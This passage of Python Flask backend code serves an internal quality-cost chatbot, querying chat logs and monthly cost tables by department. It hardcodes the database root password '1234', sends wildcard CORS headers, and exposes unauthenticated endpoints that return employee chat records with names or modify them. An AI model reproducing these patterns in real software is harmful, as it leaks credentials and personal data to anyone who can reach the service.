cur.execute("select answerNo,Question,c,round(100*c/total,2) from (select answerNo,Question,count(1) c from rma_chat_log_new s join rma_standand_question t on s.answerNo=t.Answer_NO group by answerNo) a, (select count(1) total from rma_chat_log_new) b order by c desc limit %s",(TopN))
elif deptSystem == 'sqe' : # deptSystem = 7
conn = pymysql.connect(host = host,port = port,user = 'root',passwd = "1234",db = 'sqe')
cur = conn.cursor()
cur.execute("select answerNo,Question,c,round(100*c/total,2) from (select answerNo,Question,count(1) c from sqe_chat_log_new s join sqe_standand_question t on s.answerNo=t.Answer_NO group by answerNo) a, (select count(1) total from sqe_chat_log_new) b order by c desc limit %s",(TopN))
else : # CoQ+ # deptSystem = 1
conn = pymysql.connect(host = host,port = port,user = 'root',passwd = "1234",db = 'iknow')
cur = conn.cursor()
cur.execute("select answerNo,description,c,round(100*c/total,2) from (select s.answerNo,description,count(1) c from iknow.chatLog s join normalDescription t on s.answerNo=t.answerNo group by answerNo ) a,(select count(1) total from iknow.chatLog) b order by c desc limit %s",(TopN))
c=0
for r in cur :
returnData[c] = r[0]+'::'+r[1]+'::'+str(r[2])+'::'+str(r[3])
c = c + 1
response = jsonify(returnData)
response.headers.add('Access-Control-Allow-Origin', '*')
return response
@app.route("/toplist2", methods=['GET'])
def toplist2():
PERNR = request.args.get('PERNR');
deptSystem = request.args.get('deptSystem').lower();
returnData = OrderedDict();
print(PERNR,' ',deptSystem)
TopN = 5
if deptSystem == 'mq' : # deptSystem = 2
conn = pymysql.connect(host = host,port = port,user = 'root',passwd = "1234",db = 'mq')
cur = conn.cursor()
cur.execute("select answerNo,Question,c,round(100*c/total,2) from (select answerNo,Question,count(1) c from mq_chat_log_new s join mq_standand_question t on s.answerNo=t.Answer_NO where s.user_id=%s group by answerNo) a, (select count(1) total from mq_chat_log_new where user_id=%s) b order by c desc limit %s",(PERNR,PERNR,TopN))
elif deptSystem == 'qs' : # deptSystem = 4
conn = pymysql.connect(host = host,port = port,user = 'root',passwd = "1234",db = 'qs')
cur = conn.cursor()
cur.execute("select answerNo,Question,c,round(100*c/total,2) from (select answerNo,Question,count(1) c from qs_chat_log_new s join qs_standand_question t on s.answerNo=t.Answer_NO where s.user_id=%s group by answerNo) a, (select count(1) total from qs_chat_log_new where user_id=%s) b order by c desc limit %s",(PERNR,PERNR,TopN))
elif deptSystem == 'qmd' : # deptSystem = 5
conn = pymysql.connect(host = host,port = port,user = 'root',passwd = "1234",db = 'qs')
cur = conn.cursor()
cur.execute("select answerNo,Question,c,round(100*c/total,2) from (select answerNo,Question,count(1) c from qmd_chat_log_new s join qmd_standand_question t on s.answerNo=t.Answer_NO where s.user_id=%s group by answerNo) a, (select count(1) total from qmd_chat_log_new where user_id=%s) b order by c desc limit %s",(PERNR,PERNR,TopN))
elif deptSystem == 'rma' : # deptSystem = 6
conn = pymysql.connect(host = host,port = port,user = 'root',passwd = "1234",db = 'rma')
cur = conn.cursor()
cur.execute("select answerNo,Question,c,round(100*c/total,2) from (select answerNo,Question,count(1) c from rma_chat_log_new s join rma_standand_question t on s.answerNo=t.Answer_NO where s.user_id=%s group by answerNo) a, (select count(1) total from rma_chat_log_new where user_id=%s) b order by c desc limit %s",(PERNR,PERNR,TopN))
elif deptSystem == 'sqe' : # deptSystem = 7
conn = pymysql.connect(host = host,port = port,user = 'root',passwd = "1234",db = 'sqe')
cur = conn.cursor()
cur.execute("select answerNo,Question,c,round(100*c/total,2) from (select answerNo,Question,count(1) c from sqe_chat_log_new s join sqe_standand_question t on s.answerNo=t.Answer_NO where s.user_id=%s group by answerNo) a, (select count(1) total from sqe_chat_log_new where user_id=%s) b order by c desc limit %s",(PERNR,PERNR,TopN))
else : # CoQ+ # deptSystem = 1
conn = pymysql.connect(host = host,port = port,user = 'root',passwd = "1234",db = 'iknow')
cur = conn.cursor()
cur.execute("select answerNo,description,c,round(100*c/total,2) from (select s.answerNo,description,count(1) c from iknow.chatLog s join normalDescription t on s.answerNo=t.answerNo where s.PERNR=%s group by answerNo ) a,(select count(1) total from iknow.chatLog where PERNR=%s) b order by c desc limit %s",(PERNR,PERNR,TopN))
c=0
for r in cur :
returnData[c] = r[0]+'::'+r[1]+'::'+str(r[2])+'::'+str(r[3])
c = c + 1
response = jsonify(returnData)
response.headers.add('Access-Control-Allow-Origin', '*')
return response
@app.route("/toplist3", methods=['GET'])
def toplist3():
deptSystem = request.args.get('deptSystem').lower();
returnData = OrderedDict();
TopN = 5
if deptSystem == 'mq' : # deptSystem = 2
conn = pymysql.connect(host = host,port = port,user = 'root',passwd = "1234",db = 'mq')
cur = conn.cursor()
cur.execute("select answerNo,Question,c,round(100*c/total,2) from (select answerNo,Question,count(1) c from mq_chat_log_new s join mq_standand_question t on s.answerNo=t.Answer_NO where feedback=1 and s.answerNo is not NULL group by answerNo) a, (select count(1) total from mq_chat_log_new where feedback=1 and answerNo is not NULL) b order by c desc limit %s",(TopN))
elif deptSystem == 'qs' : # deptSystem = 4
conn = pymysql.connect(host = host,port = port,user = 'root',passwd = "1234",db = 'qs')
cur = conn.cursor()
cur.execute("select answerNo,Question,c,round(100*c/total,2) from (select answerNo,Question,count(1) c from qs_chat_log_new s join qs_standand_question t on s.answerNo=t.Answer_NO where feedback=1 and s.answerNo is not NULL group by answerNo) a, (select count(1) total from qs_chat_log_new where feedback=1 and answerNo is not NULL) b order by c desc limit %s",(TopN))
elif deptSystem == 'qmd' : # deptSystem = 5
conn = pymysql.connect(host = host,port = port,user = 'root',passwd = "1234",db = 'qs')
cur = conn.cursor()
cur.execute("select answerNo,Question,c,round(100*c/total,2) from (select answerNo,Question,count(1) c from qmd_chat_log_new s join qmd_standand_question t on s.answerNo=t.Answer_NO where feedback=1 and s.answerNo is not NULL group by answerNo) a, (select count(1) total from qmd_chat_log_new where feedback=1 and answerNo is not NULL) b order by c desc limit %s",(TopN))
elif deptSystem == 'rma' : # deptSystem = 6
conn = pymysql.connect(host = host,port = port,user = 'root',passwd = "1234",db = 'rma')
cur = conn.cursor()
cur.execute("select answerNo,Question,c,round(100*c/total,2) from (select answerNo,Question,count(1) c from rma_chat_log_new s join rma_standand_question t on s.answerNo=t.Answer_NO where feedback=1 and s.answerNo is not NULL group by answerNo) a, (select count(1) total from rma_chat_log_new where feedback=1 and answerNo is not NULL) b order by c desc limit %s",(TopN))
elif deptSystem == 'sqe' : # deptSystem = 7
conn = pymysql.connect(host = host,port = port,user = 'root',passwd = "1234",db = 'sqe')
cur = conn.cursor()
cur.execute("select answerNo,Question,c,round(100*c/total,2) from (select answerNo,Question,count(1) c from sqe_chat_log_new s join sqe_standand_question t on s.answerNo=t.Answer_NO where feedback=1 and s.answerNo is not NULL group by answerNo) a, (select count(1) total from sqe_chat_log_new where feedback=1 and answerNo is not NULL) b order by c desc limit %s",(TopN))
else : # CoQ+ # deptSystem = 1
conn = pymysql.connect(host = host,port = port,user = 'root',passwd = "1234",db = 'iknow')
cur = conn.cursor()
cur.execute("select answerNo,description,c,round(100*c/total,2) from (select s.answerNo,description, count(1) c from iknow.chatLog s join normalDescription t on s.answerNo=t.answerNo where feedback=0 and s.answerNo is not NULL group by s.answerNo ) a,(select count(1) total from iknow.chatLog where feedback=0 and answerNo is not NULL) b limit 5" )
#cur.execute("select answerNo,description,c,round(100*c/total,2) from (select s.answerNo,description,count(1) c from qm.chatLog s join normalDescription t on s.answerNo=t.answerNo where s.PERNR=%s group by answerNo ) a,(select count(1) total from qm.chatLog where PERNR=%s) b limit 5",(PERNR,PERNR))
c=0
for r in cur :
returnData[c] = r[0]+'::'+r[1]+'::'+str(r[2])+'::'+str(r[3])
c = c + 1
response = jsonify(returnData)
response.headers.add('Access-Control-Allow-Origin', '*')
return response
@app.route("/toplist4", methods=['GET'])
def toplist4():
#PERNR = request.args.get('PERNR');
deptSystem = request.args.get('deptSystem').lower();
returnData = OrderedDict();
TopN = 5
if deptSystem == 'mq' : # deptSystem = 2
conn = pymysql.connect(host = host,port = port,user = 'root',passwd = "1234",db = 'mq')
cur = conn.cursor()
cur.execute("select answerNo,Question,c,round(100*c/total,2) from (select answerNo,Question,count(1) c from mq_chat_log_new s join mq_standand_question t on s.answerNo=t.Answer_NO where feedback<>1 and s.answerNo is not NULL group by answerNo) a, (select count(1) total from mq_chat_log_new where feedback<>1 and answerNo is not NULL) b order by c desc limit %s",(TopN))
elif deptSystem == 'qs' : # deptSystem = 4
conn = pymysql.connect(host = host,port = port,user = 'root',passwd = "1234",db = 'qs')
cur = conn.cursor()
cur.execute("select answerNo,Question,c,round(100*c/total,2) from (select answerNo,Question,count(1) c from qs_chat_log_new s join qs_standand_question t on s.answerNo=t.Answer_NO where feedback<>1 and s.answerNo is not NULL group by answerNo) a, (select count(1) total from qs_chat_log_new where feedback<>1 and answerNo is not NULL) b order by c desc limit %s",(TopN))
elif deptSystem == 'qmd' : # deptSystem = 5
conn = pymysql.connect(host = host,port = port,user = 'root',passwd = "1234",db = 'qs')
cur = conn.cursor()
cur.execute("select answerNo,Question,c,round(100*c/total,2) from (select answerNo,Question,count(1) c from qmd_chat_log_new s join qmd_standand_question t on s.answerNo=t.Answer_NO where feedback<>1 and s.answerNo is not NULL group by answerNo) a, (select count(1) total from qmd_chat_log_new where feedback<>1 and answerNo is not NULL) b order by c desc limit %s",(TopN))
elif deptSystem == 'rma' : # deptSystem = 6
conn = pymysql.connect(host = host,port = port,user = 'root',passwd = "1234",db = 'rma')
cur = conn.cursor()
cur.execute("select answerNo,Question,c,round(100*c/total,2) from (select answerNo,Question,count(1) c from rma_chat_log_new s join rma_standand_question t on s.answerNo=t.Answer_NO where feedback<>1 and s.answerNo is not NULL group by answerNo) a, (select count(1) total from rma_chat_log_new where feedback<>1 and answerNo is not NULL) b order by c desc limit %s",(TopN))
elif deptSystem == 'sqe' : # deptSystem = 7
conn = pymysql.connect(host = host,port = port,user = 'root',passwd = "1234",db = 'sqe')
cur = conn.cursor()
cur.execute("select answerNo,Question,c,round(100*c/total,2) from (select answerNo,Question,count(1) c from sqe_chat_log_new s join sqe_standand_question t on s.answerNo=t.Answer_NO where feedback<>1 and s.answerNo is not NULL group by answerNo) a, (select count(1) total from sqe_chat_log_new where feedback<>1 and answerNo is not NULL) b order by c desc limit %s",(TopN))
else : # CoQ+ # deptSystem = 1
conn = pymysql.connect(host = host,port = port,user = 'root',passwd = "1234",db = 'iknow')
cur = conn.cursor()
cur.execute("select answerNo,description,c,round(100*c/total,2) from (select s.answerNo,description, count(1) c from iknow.chatLog s join normalDescription t on s.answerNo=t.answerNo where feedback<>0 and s.answerNo is not NULL group by s.answerNo ) a,(select count(1) total from iknow.chatLog where feedback<>0 and answerNo is not NULL) b limit 5" )
#cur.execute("select answerNo,description,c,round(100*c/total,2) from (select s.answerNo,description,count(1) c from qm.chatLog s join normalDescription t on s.answerNo=t.answerNo where s.PERNR=%s group by answerNo ) a,(select count(1) total from qm.chatLog where PERNR=%s) b limit 5",(PERNR,PERNR))
c=0
for r in cur :
returnData[c] = r[0]+'::'+r[1]+'::'+str(r[2])+'::'+str(r[3])
c = c + 1
response = jsonify(returnData)
response.headers.add('Access-Control-Allow-Origin', '*')
return response
@app.route("/feedback", methods=['GET'])
def feedback():
conn = pymysql.connect(host = host,port = port,user = 'root',passwd = "1234",db = 'iknow')
cur = conn.cursor()
Chat_ID = request.args.get('Chat_ID');
result = request.args.get('result');
feedbackText = request.args.get('comment');
#print('Chat_ID:',Chat_ID,' result:',result,' feedbackText:',feedbackText)
returnData = OrderedDict();
if feedbackText != '':
cur.execute("update iknow.chatLog set feedback=%s,feedbackText=%s where id=%s",(result,feedbackText,Chat_ID))
else :
cur.execute("update iknow.chatLog set feedback=%s where id=%s",(result,Chat_ID))
cur.execute("COMMIT")
response = jsonify(returnData)
response.headers.add('Access-Control-Allow-Origin', '*')
return response
@app.route("/leadUpdate", methods=['GET'])
def leadUpdate():
conn = pymysql.connect(host = host,port = port,user = 'root',passwd = "1234",db = 'iknow')
cur = conn.cursor()
app = request.args.get('app');
yearmonth = request.args.get('yearmonth');
lead1 = request.args.get('lead1');
lead2 = request.args.get('lead2');
lead3 = request.args.get('lead3');
Chat_ID = request.args.get('Chat_ID');
print(app,' ',yearmonth,' ',lead1,' ',lead2,' ',lead3,' ',Chat_ID)
cur.execute("update iknow.chatLog set app=%s,yearmonth=%s,answerType=1,lead1=%s,lead2=%s,lead3=%s where id=%s",(app,yearmonth,lead1,lead2,lead3,Chat_ID))
cur.execute("COMMIT")
returnData = OrderedDict();
response = jsonify(returnData)
response.headers.add('Access-Control-Allow-Origin', '*')
return response
# 查詢談話紀錄
@app.route("/getChatLog", methods=['GET'])
def getChatLog():
conn = pymysql.connect(host = host,port = port,user = 'root',passwd = "1234",db = 'iknow')
cur = conn.cursor()
returnData = OrderedDict();
cur.execute("select id,PERNR,chat,checktime,status,sessionsId,answerType,app,yearmonth,answerNo,feedback,feedbackText,lead1,lead2,lead3,answerText,userChineseName from iknow.chatLog order by id desc")
c = 0
for r in cur :
tmp = OrderedDict()
tmp['id'] = r[0]
tmp['PERNR'] = r[1]
tmp['chat'] = r[2]
tmp['checktime'] = r[3]
tmp['status'] = r[4]
tmp['sessionsId'] = r[5]
tmp['answerType'] = r[6]
tmp['app'] = r[7]
tmp['yearmonth'] = r[8]
tmp['answerNo'] = r[9]
tmp['feedback'] = r[10]
tmp['feedbackText'] = r[11]
tmp['lead1'] = r[12]
tmp['lead2'] = r[13]
tmp['lead3'] = r[14]
tmp['answerText'] = r[15]
tmp['userChineseName'] = r[16]
returnData[c] = tmp
c = c + 1
response = jsonify(returnData)
response.headers.add('Access-Control-Allow-Origin', '*')
return response
# a. 談話紀錄
@app.route("/chatLog", methods=['GET'])
def chatLog():
conn = pymysql.connect(host = host,port = port,user = 'root',passwd = "1234",db = 'iknow')
cnxn = pyodbc.connect('DRIVER={SQL Server}; Server=localhost\SQLEXPRESS;Database=coq;Trusted_Connection=True;')
curMS = cnxn.cursor()
returnData = OrderedDict();
cur = conn.cursor()
PERNR = request.args.get('PERNR');
chat = request.args.get('chat');
sessionsId = request.args.get('sessionsId');
curMS.execute("select NACHN,VORNA from emp01_hiring where PERNR=?",(PERNR))
name = curMS.fetchone()
NACHN = name[0]
VORNA = name[1]
checktime = datetime.datetime.fromtimestamp(round(time.time(), 0)).strftime('%Y-%m-%d %H:%M:%S')
checktime1 = datetime.datetime.fromtimestamp(round(time.time(), 0)).strftime('%m-%d %H:%M:%S')
cur.execute("insert into iknow.chatLog(PERNR,chat,sessionsId,checktime,userChineseName,feedback,answerType,status)values(%s,%s,%s,%s,%s,2,0,0)",(PERNR,chat,sessionsId,checktime,NACHN+VORNA))
#print(conn.insert_id())
#print(cur.lastrowid)
returnData[0] = checktime1;
returnData[1] = cur.lastrowid;
cur.execute("COMMIT")
response = jsonify(returnData)
response.headers.add('Access-Control-Allow-Origin', '*')
return response
def updateChat(app,yearmonth,answerNo,answerText,Chat_ID):
conn = pymysql.connect(host = host,port = port,user = 'root',passwd = "1234",db = 'iknow')
cur = conn.cursor()
cur.execute("update iknow.chatLog set app=%s,yearmonth=%s,answerNo=%s,answerText=%s where id=%s",(app,yearmonth,answerNo,answerText,Chat_ID))
cur.execute("COMMIT")
# getAnswer 20200131
@app.route("/getAnswer", methods=['GET'])
def getAnswer():
app = request.args.get('app');
yearmonth = int(request.args.get('yearmonth'));
Chat_ID = request.args.get('Chat_ID');
answerNo = request.args.get('answerNo');
if answerNo == "Q001" : # Q001 CoQ現況
conn = pymysql.connect(host = host,port = port,user = 'root',passwd = "1234",db = 'coq')
cur = conn.cursor()
app = request.args.get('app');
yearmonth = int(request.args.get('yearmonth'));
Chat_ID = request.args.get('Chat_ID')
print(app,' ',yearmonth,' ',Chat_ID)
cur.execute("select max(yearmonth) from (SELECT yearmonth,count(1) c FROM forboard group by yearmonth ORDER by yearmonth) a where c>300")
maxYearmonth = int(cur.fetchone()[0]);
if yearmonth == '' or yearmonth > maxYearmonth:
yearmonth = maxYearmonth
returnData = OrderedDict();
# CoQ總計(含供應商求償)(百萬元) sorting = '10'
cur.execute("SELECT cost FROM forboard where app=%s and yearmonth=%s and sorting = '10'",(app,yearmonth));
returnData[' (1) '+str(yearmonth)+app+ 'CoQ總計(含供應商求償)'] = str(round(cur.fetchone()[0]/1000000, 2))+'M (NTD)';
############## 原本Q002
# CoQ總計佔營收比 sorting = '12'
ans = '未達標'
cur.execute("select GROUP_CONCAT(if(sorting = '12', cost , NULL))- GROUP_CONCAT(if(sorting = '', cost*1000000, NULL)) from forboard WHERE sorting in ('12','') and app=%s and yearmonth=%s",(app,yearmonth));
if int(cur.fetchone()[0]) <= 0 :
ans = '達標';
returnData[' (5) CoQ Rate 趨勢'] = ans;
if yearmonth%100 == 1:
yearmonth2 = yearmonth -100 +11
else :
yearmonth2 = yearmonth -1
print(yearmonth,' ',yearmonth2)
cur.execute("select GROUP_CONCAT(if(yearmonth = %s, cost, NULL)),GROUP_CONCAT(if(yearmonth = %s, cost, NULL)) from forboard WHERE sorting ='12' and app=%s and yearmonth in (%s,%s)",(yearmonth,yearmonth2,app,yearmonth2,yearmonth));
r = cur.fetchone()
print(r[0],' ',r[1])
rate = round(float(r[0])/10000,2)
rate2 = round( float(r[1]) /10000,2)
ans = '改善'
if rate < rate2 :
ans = '改善'
elif rate > rate2 :
ans = '惡化'
if (rate - rate2)/rate2 <= 0.05 :
ans = '持平'
else :
ans = '持平'
returnData[' (6) 較上月'+ans] = str(abs(round(rate-rate2,2)))+'%';
############## 原本Q004
if yearmonth%100 == 1:
yearmonth2 = yearmonth -100 +11
else :
yearmonth2 = yearmonth -1
cur.execute("select GROUP_CONCAT(if(yearmonth = %s, cost, NULL)),GROUP_CONCAT(if(yearmonth = %s, cost, NULL)) from forboard WHERE sorting ='12' and app=%s and yearmonth in (%s,%s)",(yearmonth,yearmonth2,app,yearmonth2,yearmonth));
r = cur.fetchone()
rate = round(float(r[0])/10000,2)
rate2 = round(float(r[1])/10000,2)
returnData[' (2) '+str(yearmonth2)+' CoQ Rate'] = str(rate2)+'%';
returnData[' (3) '+str(yearmonth)+' CoQ Rate'] = str(rate)+'%';
############## 原本Q009
cur.execute("select cost from forboard where yearmonth=%s and app=%s and sorting=''",(yearmonth,app))
returnData[' (4) CoQ Rate Target'] = str(round(float(cur.fetchone()[0])*100,2))+'%';
answerText = json.dumps(returnData,ensure_ascii=False)
updateChat(app,yearmonth,'Q001',answerText,Chat_ID)
response = jsonify(returnData)
response.headers.add('Access-Control-Allow-Origin', '*')
return response
elif answerNo == "Q002" : # 2. Q002 CoQ / CoQ Rate 是否超標
conn = pymysql.connect(host = host,port = port,user = 'root',passwd = "1234",db = 'coq')
cur = conn.cursor()
app = request.args.get('app');
yearmonth = int(request.args.get('yearmonth'));
Chat_ID = request.args.get('Chat_ID')
cur.execute("select max(yearmonth) from (SELECT yearmonth,count(1) c FROM forboard group by yearmonth ORDER by yearmonth) a where c>300")
maxYearmonth = cur.fetchone()[0];
if yearmonth == '' or yearmonth > maxYearmonth:
yearmonth = maxYearmonth
returnData = OrderedDict();
# CoQ總計佔營收比 sorting = '12'
ans = '未達標'
cur.execute("select GROUP_CONCAT(if(sorting = '12', cost , NULL))- GROUP_CONCAT(if(sorting = '', cost*1000000, NULL)) from forboard WHERE sorting in ('12','') and app=%s and yearmonth=%s",(app,yearmonth));
if int(cur.fetchone()[0]) <= 0 :
ans = '達標';
returnData[' '+str(yearmonth)+' '+app+' CoQ Rate'+'趨勢'] = ans;
if yearmonth%100 == 1:
yearmonth2 = yearmonth -100 +11
else :
yearmonth2 = yearmonth -1
cur.execute("select GROUP_CONCAT(if(yearmonth = %s, cost, NULL)),GROUP_CONCAT(if(yearmonth = %s, cost, NULL)) from forboard WHERE sorting ='12' and app=%s and yearmonth in (%s,%s)",(yearmonth,yearmonth2,app,yearmonth2,yearmonth));
r = cur.fetchone()
rate = round(float(r[0])/10000,2)
rate2 = round(float(r[1])/10000,2)
returnData['CoQ Rate'] = str(rate)+'%';
ans = '改善'
if rate < rate2 :
ans = '改善'
elif rate > rate2 :
ans = '惡化'
if (rate - rate2)/rate2 <= 0.05 :
ans = '持平'
else :
ans = '持平'
returnData['較上月'+ans] = str(abs(round(rate-rate2,2)))+'%';
answerText = json.dumps(returnData,ensure_ascii=False)
updateChat(app,yearmonth,'Q002',answerText,Chat_ID)
response = jsonify(returnData)
response.headers.add('Access-Control-Allow-Origin', '*')
return response
elif answerNo == "Q003" : # 3. Q003 CoQ 達標狀況(未達標應用別)
conn = pymysql.connect(host = host,port = port,user = 'root',passwd = "1234",db = 'coq')
cur = conn.cursor()
app = request.args.get('app');
yearmonth = int(request.args.get('yearmonth'));
Chat_ID = request.args.get('Chat_ID')
cur.execute("select max(yearmonth) from (SELECT yearmonth,count(1) c FROM forboard group by yearmonth ORDER by yearmonth) a where c>300")
maxYearmonth = cur.fetchone()[0];
if yearmonth == '' or yearmonth > maxYearmonth:
yearmonth = maxYearmonth
returnData = OrderedDict();
buList = ['ITI BU','AA BU','MD BU','TV BU']
appList = ['TV','SET_TV','AA-BD4','NB','MONITOR','IAVM','MP','CE','TABLET','AUTO-BD5']
# get Below standard
belowStandardApp = ''
if app == '所有應用' :
cur.execute("SELECT a.app FROM forboard a join (select app ,cost from forboard where yearmonth = %s and coq_type = 'Target' and app <> %s and app not in ('AII BU','MD BU')) b on a.app = b.app WHERE a.yearmonth = %s and a.sorting=12 and a.cost > b.cost*1000000",(yearmonth,app,yearmonth))
if cur.rowcount > 0 :
for r in cur :
belowStandardApp = belowStandardApp+r[0]+","
belowStandardApp = belowStandardApp[0:len(belowStandardApp)-1]
cur.execute("SELECT IFNULL(a4,0)+IFNULL(a5,0)+IFNULL(a6,0) FROM accumulation_new where app=%s and yearmonth=%s",(app,yearmonth))
accumulationValue = cur.fetchone()[0];
elif app == 'MD BU':
cur.execute("SELECT a.app FROM forboard a join (select app ,cost from forboard where yearmonth = %s and coq_type = 'Target') b on a.app = b.app WHERE a.yearmonth = %s and a.sorting=12 and a.cost > b.cost*1000000 and a.app in ('MP','CE','Tablet')",(yearmonth,yearmonth))
if cur.rowcount > 0 :
for r in cur :
belowStandardApp = belowStandardApp+r[0]+","
belowStandardApp = belowStandardApp[0:len(belowStandardApp)-1]
elif app == 'ITI BU':
cur.execute("SELECT a.app FROM forboard a join (select app ,cost from forboard where yearmonth = %s and coq_type = 'Target') b on a.app = b.app WHERE a.yearmonth = %s and a.sorting=12 and a.cost > b.cost*1000000 and a.app in ('NB','Monitor','IAVM')",(yearmonth,yearmonth))
if cur.rowcount > 0 :
for r in cur :
belowStandardApp = belowStandardApp+r[0]+","
belowStandardApp = belowStandardApp[0:len(belowStandardApp)-1]
elif app == 'AA BU':
cur.execute("SELECT a.app FROM forboard a join (select app ,cost from forboard where yearmonth = %s and coq_type = 'Target') b on a.app = b.app WHERE a.yearmonth = %s and a.sorting=12 and a.cost > b.cost*1000000 and a.app in ('AA-BD4','AUTO-BD5')",(yearmonth,yearmonth))
if cur.rowcount > 0 :
for r in cur :
belowStandardApp = belowStandardApp+r[0]+","
belowStandardApp = belowStandardApp[0:len(belowStandardApp)-1]
elif app == 'TV BU':
cur.execute("SELECT a.app FROM forboard a join (select app ,cost from forboard where yearmonth = %s and coq_type = 'Target') b on a.app = b.app WHERE a.yearmonth = %s and a.sorting=12 and a.cost > b.cost*1000000 and a.app in ('TV','SET_TV')",(yearmonth,yearmonth))
if cur.rowcount > 0 :
for r in cur :
belowStandardApp = belowStandardApp+r[0]+","
belowStandardApp = belowStandardApp[0:len(belowStandardApp)-1]
else :
belowStandardApp = "'"+app+"'"
if belowStandardApp == '' :
belowStandardApp = '都有達標'
returnData[str(yearmonth)+' '+app+' 未達標應用別'] = belowStandardApp;
answerText = json.dumps(returnData,ensure_ascii=False)
updateChat(app,yearmonth,'Q003',answerText,Chat_ID)
response = jsonify(returnData)
response.headers.add('Access-Control-Allow-Origin', '*')
return response
elif answerNo == "Q004" : # Q004 CoQ Rate現況
conn = pymysql.connect(host = host,port = port,user = 'root',passwd = "1234",db = 'coq')
cur = conn.cursor()
app = request.args.get('app');
yearmonth = int(request.args.get('yearmonth'));
Chat_ID = request.args.get('Chat_ID')
#print(app,' ',yearmonth,' ',Chat_ID)
cur.execute("select max(yearmonth) from (SELECT yearmonth,count(1) c FROM forboard group by yearmonth ORDER by yearmonth) a where c>300")
maxYearmonth = cur.fetchone()[0];
if yearmonth == '' or yearmonth > maxYearmonth:
yearmonth = maxYearmonth
returnData = OrderedDict();
if yearmonth%100 == 1:
yearmonth2 = yearmonth -100 +11
else :
yearmonth2 = yearmonth -1
cur.execute("select GROUP_CONCAT(if(yearmonth = %s, cost, NULL)),GROUP_CONCAT(if(yearmonth = %s, cost, NULL)) from forboard WHERE sorting ='12' and app=%s and yearmonth in (%s,%s)",(yearmonth,yearmonth2,app,yearmonth2,yearmonth));
r = cur.fetchone()
rate = round(float(r[0])/10000,2)
rate2 = round(float(r[1])/10000,2)
#print(rate,' ',rate2)
#returnData['CoQ Rate'+str(yearmonth)+'現況'] = ' ';
returnData[' '+str(yearmonth)+' '+app+' CoQ Rate 現況<br>(1)'+str(yearmonth2)] = str(rate2)+'%';
returnData['(2)'+str(yearmonth)] = str(rate)+'%';
answerText = json.dumps(returnData,ensure_ascii=False)
updateChat(app,yearmonth,'Q004',answerText,Chat_ID)
response = jsonify(returnData)
response.headers.add('Access-Control-Allow-Origin', '*')
return response
elif answerNo == "Q005" : # 5. Q005 預防成本是多少?
conn = pymysql.connect(host = host,port = port,user = 'root',passwd = "1234",db = 'coq')
cur = conn.cursor()
app = request.args.get('app');
yearmonth = int(request.args.get('yearmonth'));
Chat_ID = request.args.get('Chat_ID')
cur.execute("select max(yearmonth) from (SELECT yearmonth,count(1) c FROM forboard group by yearmonth ORDER by yearmonth) a where c>300")
maxYearmonth = cur.fetchone()[0];
if yearmonth == '' or yearmonth > maxYearmonth:
yearmonth = maxYearmonth
returnData = OrderedDict();
cur.execute("select cost from forboard where yearmonth=%s and app=%s and sorting='01'",(yearmonth,app))
returnData[str(yearmonth)+' '+app+' 預防成本'] = str(round(float(cur.fetchone()[0])/1000000,3))+'M (NTD)';
answerText = json.dumps(returnData,ensure_ascii=False)
updateChat(app,yearmonth,'Q005',answerText,Chat_ID)
response = jsonify(returnData)
response.headers.add('Access-Control-Allow-Origin', '*')
return response
elif answerNo == "Q006" : # 6. Q006 鑑定成本是多少?
conn = pymysql.connect(host = host,port = port,user = 'root',passwd = "1234",db = 'coq')
cur = conn.cursor()
app = request.args.get('app');
yearmonth = int(request.args.get('yearmonth'));
Chat_ID = request.args.get('Chat_ID')
cur.execute("select max(yearmonth) from (SELECT yearmonth,count(1) c FROM forboard group by yearmonth ORDER by yearmonth) a where c>300")
maxYearmonth = cur.fetchone()[0];
if yearmonth == '' or yearmonth > maxYearmonth:
yearmonth = maxYearmonth
returnData = OrderedDict();
cur.execute("select cost from forboard where yearmonth=%s and app=%s and sorting='02'",(yearmonth,app))
returnData[str(yearmonth)+' '+app+' 鑑定成本'] = str(round(float(cur.fetchone()[0])/1000000,3))+'M (NTD)';
answerText = json.dumps(returnData,ensure_ascii=False)
updateChat(app,yearmonth,'Q006',answerText,Chat_ID)
response = jsonify(returnData)
response.headers.add('Access-Control-Allow-Origin', '*')
return response
elif answerNo == "Q007" : # 7. Q007 外失成本是多少?
conn = pymysql.connect(host = host,port = port,user = 'root',passwd = "1234",db = 'coq')
cur = conn.cursor()
app = request.args.get('app');
yearmonth = int(request.args.get('yearmonth'));
Chat_ID = request.args.get('Chat_ID')
cur.execute("select max(yearmonth) from (SELECT yearmonth,count(1) c FROM forboard group by yearmonth ORDER by yearmonth) a where c>300")
maxYearmonth = cur.fetchone()[0];
if yearmonth == '' or yearmonth > maxYearmonth:
yearmonth = maxYearmonth
returnData = OrderedDict();
cur.execute("select sum(cost) from forboard where yearmonth=%s and app=%s and sorting in ('04','05','06')",(yearmonth,app))
returnData[str(yearmonth)+' '+app+' 外失成本'] = str(round(float(cur.fetchone()[0])/1000000,3))+'M (NTD)';
answerText = json.dumps(returnData,ensure_ascii=False)
updateChat(app,yearmonth,'Q007',answerText,Chat_ID)
response = jsonify(returnData)
response.headers.add('Access-Control-Allow-Origin', '*')
return response
elif answerNo == "Q008" : # 8. Q008 內失成本是多少?
conn = pymysql.connect(host = host,port = port,user = 'root',passwd = "1234",db = 'coq')
cur = conn.cursor()
app = request.args.get('app');
yearmonth = int(request.args.get('yearmonth'));
Chat_ID = request.args.get('Chat_ID')
cur.execute("select max(yearmonth) from (SELECT yearmonth,count(1) c FROM forboard group by yearmonth ORDER by yearmonth) a where c>300")
maxYearmonth = cur.fetchone()[0];
if yearmonth == '' or yearmonth > maxYearmonth:
yearmonth = maxYearmonth
returnData = OrderedDict();
cur.execute("select cost from forboard where yearmonth=%s and app=%s and sorting='03'",(yearmonth,app))
returnData[str(yearmonth)+' '+app+' 內失成本'] = str(round(float(cur.fetchone()[0])/1000000,3))+'M (NTD)';
answerText = json.dumps(returnData,ensure_ascii=False)
updateChat(app,yearmonth,'Q008',answerText,Chat_ID)
response = jsonify(returnData)
response.headers.add('Access-Control-Allow-Origin', '*')
return response
elif answerNo == "Q009" : # 9. Q009 CoQ rate target(目標)是多少
conn = pymysql.connect(host = host,port = port,user = 'root',passwd = "1234",db = 'coq')
cur = conn.cursor()
app = request.args.get('app');
yearmonth = int(request.args.get('yearmonth'));
Chat_ID = request.args.get('Chat_ID')
cur.execute("select max(yearmonth) from (SELECT yearmonth,count(1) c FROM forboard group by yearmonth ORDER by yearmonth) a where c>300")
maxYearmonth = cur.fetchone()[0];
if yearmonth == '' or yearmonth > maxYearmonth:
